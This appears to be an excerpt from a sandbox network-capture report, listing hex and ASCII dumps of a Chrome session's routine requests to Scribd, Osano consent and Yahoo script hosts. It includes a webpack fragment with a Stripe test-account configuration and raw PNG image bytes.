                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC16384INData Raw: 22 2c 76 32 4b 65 79 3a 7b 69 64 3a 22 63 61 70 63 68 61 73 65 2d 74 65 73 74 2d 6b 65 79 22 2c 6e 61 6d 65 3a 22 43 61 70 63 68 61 73 65 20 74 65 73 74 20 6b 65 79 22 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 22 55 53 20 61 63 63 6f 75 6e 74 20 66 6f 72 20 74 65 73 74 69 6e 67 20 43 61 70 63 68 61 73 65 20 50 61 79 22 2c 61 63 63 6f 75 6e 74 49 64 3a 22 61 63 63 74 5f 31 51 47 63 46 59 42 53 4a 38 41 6a 6b 78 6a 79 22 2c 73 63 65 6e 61 72 69 6f 73 4c 69 6e 6b 3a 22 68 74 74 70 73 3a 2f 2f 61 64 6d 69 6e 2e 63 6f 72 70 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 73 63 65 6e 61 72 69 6f 73 3f 72 75 6e 49 64 3d 73 63 6e 72 75 6e 2a 41 5a 4c 72 35 4b 4d 41 32 77 41 41 41 43 78 55 22 7d 7d 5d 2c 74 65 73 74 43 6f 6e 66 69 67 3a 7b 61 6d 6f 75 6e 74 3a 31 65 36 7d 7d 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ",v2Key:{id:"capchase-test-key",name:"Capchase test key",description:"US account for testing Capchase Pay",accountId:"acct_1QGcFYBSJ8Ajkxjy",scenariosLink:"https://admin.corp.stripe.com/scenarios?runId=scnrun*AZLr5KMA2wAAACxU"}}],testConfig:{amount:1e6}},
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:25 UTC16384INData Raw: 63 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 31 34 31 33 29 2c 6f 3d 6e 28 39 35 38 31 29 2c 69 3d 28 6e 28 39 34 32 29 2c 22 73 70 63 22 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 65 2e 70 61 79 6d 65 6e 74 49 6e 74 65 6e 74 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 65 2e 73 65 74 75 70 49 6e 74 65 6e 74 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 22 6f 62 6a 65 63 74 22 3a 72 65 74 75 72 6e 7b 70 61 79 6d 65 6e 74 49 6e 74 65 6e 74 3a 65 2e 6f 62 6a 65 63 74 7d 3b 63 61 73 65 22 65 72 72 6f 72 22 3a 76 61 72 20 6e 3d 74 3f 7b 70 61 79 6d 65 6e 74 5f 69 6e 74 65 6e 74 3a 74 7d 3a 7b 7d 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: c}});var r=n(1413),o=n(9581),i=(n(942),"spc"),a=function(e){return void 0!==e.paymentIntent},c=function(e){return void 0!==e.setupIntent},s=function(e,t){switch(e.type){case"object":return{paymentIntent:e.object};case"error":var n=t?{payment_intent:t}:{};


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        23192.168.2.164973952.222.144.74436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:23 UTC510OUTOPTIONS /record HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: consent.api.osano.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST,OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                        x-amzn-RequestId: 586e7b54-c4ee-4de7-a51e-0717ee0fb198
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type,X-Amz-Date,Authorization,X-Api-Key,X-Amz-Security-Token
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-apigw-id: CY8FdFQioAMEQ7Q=
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 c036ebfd4f49d40799f1a252f4bef276.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-C2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: oSxSrsvWLoS0M7HCfGHS9oqvEY3kM6iz_oz8dlqkQhVwRzqavwFeCg==


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        24192.168.2.1649740151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC402OUTGET /webpack/assets/images/shared/gr_table_reading.9f6101a1.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC556INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 29999
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 29 Aug 2024 21:16:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "d1e083f52aaed174a437ae88ebff5785"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2727953
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740060-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 2836
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522364.493169,VS0,VE0
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fe 00 00 01 68 08 06 00 00 00 b6 50 99 7b 00 00 74 f6 49 44 41 54 78 da ec 9d 6b 6c 14 65 14 86 0f 28 dd 45 40 8b 80 28 92 60 15 d3 02 21 40 04 bc 05 88 26 44 71 bb 65 67 96 89 20 10 11 09 48 4d 11 fc 41 10 7f b0 0a ca 2e 25 20 c6 2a 30 33 bb 50 41 66 a6 17 52 2f 28 89 11 fd 23 31 29 1a 2f 11 35 1a 6f 51 d0 44 01 45 8d 08 8c e7 03 43 4b 77 bb ee 2e 65 77 ba df fb 24 6f 26 69 48 cb 8f ef 9c 77 cf d9 f3 9d 21 00 00 00 20 9f cc ad df db 47 31 9d 5b 43 ba b3 58 31 ed 4d 8a 6e ef 08 19 f6 6b fc dc cf cf cf f8 f9 93 62 d8 7f 87 0c eb 30 3f df e3 e7 4e fe b7 0b c3 f1 a6 eb 09 00 00 00 00 de 25 e2 ba 3d 67 c4 1b 6e 53 4d 7b a5 62 58 0e eb 0b 36 f7 d3 21 dd 72 73 91 62 d8 1f 2b a6 fd f0 ec 1d 7b 2e 27 00 ba
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRhP{tIDATxkle(E@(`!@&Dqeg HMA.% *03PAfR/(#1)/5oQDECKw.ew$o&iHw! G1[CX1Mnkb0?N%=gnSM{bX6!rsb+{.'
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: d9 df 62 c5 75 81 58 e7 ab ba 5b 7a 33 cf 46 be ca 16 02 49 a8 3b 9a 86 62 92 3f 59 e3 22 b5 6e bf 79 8b dd 81 8b 96 ba d3 b7 5a d5 04 a4 40 35 ac 45 b2 9f fd 8c 14 b7 b1 19 b5 10 f0 d0 da eb d2 9b 79 56 aa 3c 55 eb 0f e2 55 93 1d 50 74 67 85 f4 49 ac 83 26 ae d9 20 4c ff 9c 6e 8f d6 7d 42 a0 e8 99 a5 b7 0c e6 ee d7 31 d9 cf 7f 66 b2 5b 09 e4 97 98 af aa 9c ef a8 9f 86 99 67 a7 a8 2f b8 91 c0 79 88 00 46 12 6b d3 98 55 31 61 f6 e7 a9 7c f9 13 ae e8 8c 10 28 f6 29 fe cd b2 9f ff 6c 14 36 1a c7 11 c8 1f 6c 60 cf cb 6e e2 39 2e f4 39 5a 37 48 eb 4b e0 0c 73 eb f7 f6 19 bf 7a 03 da fc ac e9 3c c8 57 b1 62 b5 30 fa 24 f5 7f b0 c6 ad da fc d2 1c 02 45 8b 56 ef 94 89 dd 0d b2 c7 01 96 5c 79 94 8d a5 a1 52 36 b0 e3 b2 9b 78 ae e2 9b 10 4b 08 9c 61 ea a6 c4 3d fd
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: buX[z3FI;b?Y"nyZ@5EyV<UUPtgI& Ln}B1f[g/yFkU1a|()l6l`n9.9Z7HKsz<Wb0$EV\yR6xKa=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: f3 6c 26 65 b3 88 bf 41 d5 c9 b9 27 a2 0c 5c a3 af e6 33 a0 c3 f2 b6 03 e1 de fd 07 b0 b5 a8 18 14 e9 eb 61 b8 4f c8 73 27 fa 3e 32 5f 98 9a 90 0c 99 07 7e 82 8a 3b 55 40 38 72 f9 2a d9 4b c0 73 a9 3f f4 33 c4 10 1d 58 58 92 a6 7b 4c da 38 3b 25 af 7f 6e 84 ff 79 7a 36 e4 15 97 c2 23 b5 1a b4 a1 6e 6c 84 dc 13 25 f0 d9 ea 6c 5d 0f ae 22 7b 6d 74 db bf 23 95 55 b0 73 50 0c 9f ed db e3 da 7d 35 93 b2 99 a2 83 e3 3c 44 19 76 32 9f 6a 5e a5 7b 72 5f 68 78 ac 86 d6 54 d5 d5 c3 be 92 52 58 b4 75 27 38 c7 af 84 61 73 82 05 b3 2a d0 4f e1 07 ff 89 89 87 b0 ec 7c d8 72 fc 04 94 df be 03 da 18 bb 70 11 ef 6b f6 90 79 0f 46 0c d1 d1 dd 45 d1 bb d9 7d 26 0d 9f 9a ca 53 05 1d ae eb f2 e1 6a f5 3d e0 c3 f5 9a 5a f0 cf df c5 f7 1c 0b b2 b9 56 af 71 67 e3 2a 1f 8b 18 fa
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l&eA'\3aOs'>2_~;U@8r*Ks?3XX{L8;%nyz6#nl%l]"{mt#UsP}5<Dv2j^{r_hxTRXu'8as*O|rpkyFE}&Sj=ZVqg*
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: 26 0d da 98 03 4f 58 83 18 b4 2d f9 67 93 cf c0 e8 d0 05 20 24 aa ee 3f 20 25 7e 06 35 f2 29 bd 56 69 9e f6 d9 52 59 0e 62 68 27 c6 c2 69 12 ed 92 15 64 58 4a 76 8a 5c fc 19 f0 84 65 bb f6 b5 39 80 77 9f 2e 05 31 d2 ad 1d f1 93 4e 82 4f a8 62 07 90 d0 85 b5 9b 5b 17 2c ae ab e4 73 70 ec d2 15 10 12 9b 4f 9d 23 e2 e7 fa ef eb 43 f2 6e 6e bc 9b 23 d4 9d 67 c8 87 22 86 d6 da fd 42 ea 25 2b c0 20 15 16 71 16 8e 2f 8b 58 fc 45 d0 8c fe 6d 74 b1 3b 80 5b ec 8a 91 1e b3 bc 9e b6 31 49 d3 4a fc 84 3e 88 41 15 36 d3 15 1f 10 79 cd 48 4e 07 21 41 2a 04 bc 72 77 70 f2 af b8 5b 03 ba f2 45 62 b2 39 0f cd da 84 18 2d 51 75 9a 38 92 76 c1 0a 7c d6 bf 52 c4 e2 af 83 66 2c da b6 5b fb 99 fc 32 5f 10 2b d3 53 d7 6a 7d cf 23 fc c2 b9 7f a3 f2 5a 88 9f e5 2b 29 04 3f 04 7a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &OX-g $? %~5)ViRYbh'idXJv\e9w.1NOb[,spO#Cnn#g"B%+ q/XEmt;[1IJ>A6yHN!A*rwp[Eb9-Qu8v|Rf,[2_+Sj}#Z+)?z
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: 12 69 0c 3f 06 30 6c ec 43 43 4d 69 91 ab c2 17 63 84 45 ca b3 5d 22 5d 64 f8 8a b5 ec 1a 75 56 2c 5e a2 9e 6f c0 1b 44 db 48 1c ef b0 67 54 6d 49 a4 d7 34 b0 da f7 f4 17 bb 69 1a 48 90 df 05 fd 7a 53 b9 f4 a3 03 ff 37 45 03 bb df 70 3f 70 e4 d9 7b ee 62 e9 8b 29 6c d7 3e ac da bc 5d dd 17 46 09 9d 60 ed a4 f7 bd 39 e1 18 6a cb de e4 b2 06 d6 63 5e 84 4e a5 f8 b1 9c fe f5 df 27 e8 ae e9 cb 47 f9 9f 66 41 93 44 4b b0 55 bb 20 d3 67 62 3b 79 d5 25 dc 78 40 92 d8 4d d3 50 14 69 32 c0 8d e8 3a 12 e7 36 44 22 fd 5e d9 c0 7e 45 22 45 4a 15 2d 47 4b 44 b6 ea 3f 94 78 09 e3 d6 6d c6 ca 6f 8f c9 fa 96 b7 70 f7 80 c0 d5 42 01 d5 0a 22 69 d7 80 70 0c 0a d6 71 ae bc 81 4d 8e de 01 5d 61 fd e9 0b 70 98 28 8b cf d1 0b d1 80 c9 cf b4 b7 f0 71 1e 25 dc f8 1d 7d 48 75 88
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: i?0lCCMicE]"]duV,^oDHgTmI4iHzS7Ep?p{b)l>]F`9jc^N'GfADKU gb;y%x@MPi2:6D"^~E"EJ-GKD?xmopB"ipqM]ap(q%}Hu
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: 73 16 c2 ca 77 42 cd d6 f2 97 b8 74 16 9e bf 2f 9d 4b 38 dc f8 35 0d 3d c7 77 17 bb c1 71 29 96 9b d5 db 2f 5e 3e 67 49 63 c7 f6 e4 25 b3 a2 79 b0 f1 e7 26 5e a3 68 dc c9 19 76 3d 2c f6 84 70 2a 60 e9 1b 38 59 55 13 63 69 7e e7 6f dc c2 cb e0 d2 5f 0f d1 7d d9 7a ad 99 fd 98 d5 1b d8 44 46 d6 c5 b2 32 72 f3 9e e2 97 5f af 20 ee bb 13 45 6d fc 43 37 58 8e f0 3b 4d ff 7f 81 80 f3 fe 4e c2 8d df e9 d3 6a 54 ec eb 4d 38 dc f8 35 0d 4b e1 12 bb c1 71 29 56 eb d7 db 97 7d 76 8a 89 44 ba 99 d8 b5 b4 d7 fa 98 b4 f4 6c 40 27 a4 8b 68 70 e1 a3 72 c1 86 7f c4 79 7b d7 26 1c 39 e8 8a 74 94 3a 26 e6 10 f4 09 ae df 7b 00 6d f3 d3 cd db e8 1c b1 4a a3 86 df c8 7f 12 3e db b9 17 e9 d9 39 50 c4 83 d4 34 ac dc f4 15 86 d2 7f e7 e8 f6 0e 5e b1 73 aa 58 25 b4 59 4b 98 f6 19
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: swBt/K85=wq)/^>gIc%y&^hv=,p*`8YUci~o_}zDF2r_ EmC7X;MNjTM85Kq)V}vDl@'hpry{&9t:&{mJ>9P4^sX%YK
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: 5e 6b 1d e7 b7 5e c4 b6 f8 56 91 bf bf 42 f0 f3 c3 8e 13 38 35 6b fc 59 5f bf 35 38 23 a6 7d 06 33 fc b2 ca a4 13 81 9c 38 d7 46 44 9f b0 93 7e 5c fe 9e b8 d6 77 15 bd d1 71 c9 8b 4d 06 ab df 62 59 ba 55 13 e6 4f bb 40 1e ad e4 ac 3f 96 70 64 30 53 57 21 60 6e c7 f3 49 42 e0 a5 aa 8a e4 5c a4 a6 ab 0e f9 85 85 f8 e2 c8 71 38 4c f8 44 f6 3d 3a d2 d5 7e e3 89 d3 54 36 fe 8d 27 7e 44 59 ae 5c 4f 81 6d 6b b7 d2 b1 64 f6 46 2b ac 8f d9 05 6d 10 7b 25 45 ce fc ed ff 8e f8 af e3 d2 41 e1 b5 be fa 4f fa e0 0d a5 19 2d 12 e9 45 81 93 e6 74 d9 6e 02 e7 ff ec 9d 09 5c 13 57 1e c7 9f 5a b9 44 4e a5 10 10 51 b4 04 a2 20 ca 21 d6 03 f1 a0 08 91 5e 58 ab 56 25 60 ba 24 1c a5 b6 78 55 97 ba d6 7a ad ae 76 b5 b6 b5 b6 ab e2 81 ad 56 b1 b5 2b 56 b1 ba 4a 17 b5 96 aa 58 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ^k^VB85kY_58#}38FD~\wqMbYUO@?pd0SW!`nIB\q8LD=:~T6'~DY\OmkdF+m{%EAO-Etn\WZDNQ !^XV%`$xUzvV+VJXi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: a7 3b ab 66 34 c2 5a 14 fc 31 af 40 1f 87 a4 54 03 49 7e 75 6b 3c 26 bb 00 0c e5 96 9e 19 cb 5c c9 af b8 d3 55 a9 f4 6c 73 7c 9a 72 38 87 19 ff 4a fa ee 01 45 a9 59 e0 4f 53 4e d4 39 4f 4d d4 1d 13 03 46 27 c3 da ba 3a 68 2d b5 50 5e 71 fc 8c d1 1c ff 29 5b 8b b4 cb fd 0e b1 49 ea 00 9f d0 a7 19 c6 73 48 b8 ce fd fd 5d 3c 3f 17 2d c0 bf bf 3b 20 b2 85 ed 7c b1 dd a8 a0 9e 9b 46 e0 bf c1 b6 7e 06 21 d1 d4 c0 6b e4 3a e8 5e e8 3a 0c 7b e0 11 ab 8c c6 82 90 d0 a7 17 45 71 d4 4a bf 14 47 6a ff fe 5d e6 fc 7e 69 36 c0 50 68 7f 3e 63 0a 5f 5a c6 b3 cc c7 2b 63 58 83 5a a6 a0 75 a3 43 2b 08 e6 2e f1 2b fe 7d a4 47 fc 92 7f ae eb d4 b3 9f b6 e8 d8 3f 22 16 5e bb 7e 03 5a 53 db cf fe cc aa 8b 9f 67 e4 28 f5 2e 83 7e 83 35 c9 7d d1 0c 33 75 f1 f3 3a 71 e8 37 79 56
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;f4Z1@TI~uk<&\Uls|r8JEYOSN9OMF':h-P^q)[IsH]<?-; |F~!k:^:{EqJGj]~i6Ph>c_Z+cXZuC+.+}G?"^~ZSg(.~5}3u:q7yV
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: 5a 16 9b b1 db c8 73 dc ef 07 44 04 fc ac 04 61 07 d4 1c c2 92 27 5d 79 97 38 ec c1 87 bb 5f 72 1e de de e0 7f 00 7c c5 9e dc f2 fb 13 ff 63 60 d6 bf 11 10 31 80 5f a9 34 52 d4 37 84 45 1b 60 6f 86 78 e0 2b fa 8f 3d 99 31 13 3a 8a a3 a0 53 ef 30 58 7a ea 0c b4 86 9a 5a 5a 68 ed 75 f9 fa fc ed 7b f0 ad 43 df 69 bf 1f 28 9f 29 e4 76 d6 79 80 88 80 9f 95 7c 83 13 2d 3d 00 27 39 8f c0 1e 7c b8 7b 9c eb 90 f6 05 3f b2 6f f0 7c 4e e0 77 94 4e 32 00 fe fa 95 2e 29 1e 80 88 26 aa fa 7f 36 73 41 5f 46 21 ab d3 6c 6e ae a3 fe 73 07 be b3 6a 8f fe 63 3e 93 d2 61 47 91 18 7e b1 ff 20 b4 86 1e 3e 6e a2 65 ef f3 75 de c1 13 b0 ae a1 91 f6 58 54 d6 5c e1 c6 3b e2 16 11 01 3f cb 2d 7c 25 96 1e 80 e3 5d 86 62 0f 3e dc 3d cc 2d ba fd c1 8f b2 ce 03 62 1d 00 4b a1 0a 7e 54
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ZsDa']y8_r|c`1_4R7E`ox+=1:S0XzZZhu{Ci()vy|-='9|{?o|NwN2.)&6sA_F!lnsjc>aG~ >neuXT\;?-|%]b>=-bK~T
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC1378INData Raw: b7 fa 47 a9 74 64 f8 ff 57 e0 30 0a f6 9e 2a 57 6d 82 b8 2b 2c 1a e4 40 42 4e 1e 2c f1 0b 91 5c f4 bf 39 13 2c 5e bb 36 4e de 48 d4 fb b8 31 9b f7 c8 21 fc 47 05 0e 2e fc 75 c1 e1 74 50 b7 c1 cb 36 28 b2 c9 4e 6c 35 88 79 01 64 95 7d db d8 9a ab f0 1b 9d 91 ef d2 6c d4 04 1d c2 5f ba b1 e5 b8 17 05 0e 03 45 5f 3d 4d 9b 18 ba 06 86 43 79 79 85 e4 09 7c 1e 71 49 e0 20 71 02 1f 71 6d 60 04 e4 14 97 40 6d fc 66 e0 04 bf 41 8b bf 97 61 5d 5b 7f 2d 70 70 e1 af 0b 76 9e ea 4f 6d aa 1b 48 c8 ce 11 7f 19 c0 bc 00 b2 4a ab bf f6 36 57 e1 bf 20 18 09 d5 60 e7 27 d1 ea 4f d5 91 e1 bf 54 e0 30 20 99 cf ff 4d b4 f6 4b 34 85 70 85 df 45 28 7c 58 24 79 6d fe 3a 19 12 f8 88 07 a2 e2 6a 92 f8 08 15 95 95 b0 27 d2 f0 30 82 cd e7 4e 32 54 ab 74 ed 2b 70 70 e1 af 0b 78 02 76
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GtdW0*Wm+,@BN,\9,^6NH1!G.utP6(Nl5yd}l_E_=MCyy|qI qqm`@mfAa][-ppvOmHJ6W `'OT0 MK4pE(|X$ym:j'0N2Tt+ppxv


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        25192.168.2.1649741188.125.88.2064436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:24 UTC517OUTGET /wi/ytc.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:25 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-id-2: lzoelpobxEfqX3Mmg/Vbpj8Ues8PZK5VI/XradZaLvysqjcsRQsahSLgfWC9rHGsFP5uw0jwr3g=
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-request-id: 4AVQGB5Q2GYHSTF1
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:36:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 28 Aug 2024 12:33:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-expiration: expiry-date="Fri, 03 Oct 2025 00:00:00 GMT", rule-id="oath-standard-lifecycle"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public,max-age=3600
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: JRuD6BVFDpXh1T7iUrCVWNpcX_ACBwVG
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19863
                                                                                                                                                                                                                                                                                                                                                                                        Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "bc033c3a83e1880e480086bf11ac0b0a"
                                                                                                                                                                                                                                                                                                                                                                                        Age: 1378
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:25 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
